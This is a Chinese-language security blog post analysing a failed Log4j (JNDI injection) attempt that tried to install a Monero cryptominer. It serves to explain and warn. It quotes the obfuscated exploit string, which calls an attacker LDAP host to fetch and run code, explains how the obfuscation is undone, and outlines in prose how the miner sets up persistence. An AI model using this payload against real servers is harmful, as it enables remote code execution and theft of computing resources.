在最新的网络安全动态中,一起利用Log4j漏洞的恶意攻击企图引起了广泛关注。攻击者巧妙地在HTTP请求的Cookie字段中嵌入了一段精心设计的代码,试图通过t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//cdn.x4b.lol:3306/TomcatBypass/Command/Base64/...}')这一复杂结构,触发JNDI注入,进而利用ldap协议实现远程代码执行。尽管本次尝试未能得逞,但其背后隐藏的门罗币挖矿启动脚本揭示了攻击者的真正意图——非法利用目标系统的算力进行加密货币挖掘。
该脚本不仅包含基本的欢迎信息和使用指导,还具备强大的自我检查机制,确保在合适的环境下运行,包括对命令行参数的验证、系统工具的检测,以及基于CPU信息的性能预估。这一系列操作不仅体现了攻击者的技术娴熟,也警示我们关于系统安全的重要性,尤其是对于Log4j等广泛使用的组件,必须保持高度警惕,及时更新和打补丁,以防范此类潜在威胁。
今天告警巡逻,又抓到一个门罗币挖矿启动脚本,利用log4j漏洞,在HTTP请求的多个字段中进行注入,经过分析,是漏洞探测,没有攻击成功。简单分析如下,HTTP请求中Cookie 字段被设置为 t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//cdn.x4b.lol:3306/TomcatBypass/Command/Base64/...}')。这段字符串中有一些占位符 ${},这是 Log4j 的表达式语法。在这里,它试图执行一些环境变量(env)的操作。攻击者利用这些环境变量来构造 JNDI 注入链,其中涉及到 ldap 协议,用于触发远程代码执行。${env:NaN:-j} 尝试检索环境变量NaN的值。NaN本身并不是一个有效的环境变量,因此它将返回备用值-j。翻译翻译就是:t('${jndi:ldap://cdn.x4b.lol:3306/TomcatBypass/Command/Base64/...}'
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
Base64后面的内容,就是下载门罗币挖矿启动脚本并执行,它的功能分为几个部分:
- 设置和打印欢迎信息: 在脚本一开始,它声明了版本号并打印了一些提示信息,告知如何报告问题以及脚本的使用方法。
- 命令行参数检查: 通过接收命令行参数,例如钱包地址和可选的邮箱地址,然后对它们进行检查。如果未提供钱包地址,脚本会输出错误信息并退出。
- 检查前提条件: 脚本会检查系统是否符合脚本运行的先决条件,如检查是否设置了 $HOME 环境变量、是否安装了 curl 和 lscpu 工具等。
- 计算参数和预期性能: 使用 lscpu 命令获取系统的 CPU 信息,并据此计算 Monero 加密货币挖矿的预期性能,包括线程数、CPU 频率、缓存大小等。
- 打印意图和说明: 输出一些文字,介绍脚本接下来的操作意图,告知将下载、设置和运行 Monero CPU 挖矿程序。也会显示挖矿预期性能和一些使用提示。
- 执行挖矿准备工作: 删除旧的挖矿程序、下载最新的挖矿程序、配置挖矿参数、创建挖矿相关的脚本等。
- 后台挖矿配置: 根据系统情况选择后台挖矿的方式,比如通过设置 systemd 服务或在用户的 .profile 文件中添加挖矿命令等。
- 挖矿使用提示: 提示用户如何在使用共享 VPS 的情况下合理使用 CPU 资源,并提供了一些限制 CPU 使用率的方法。
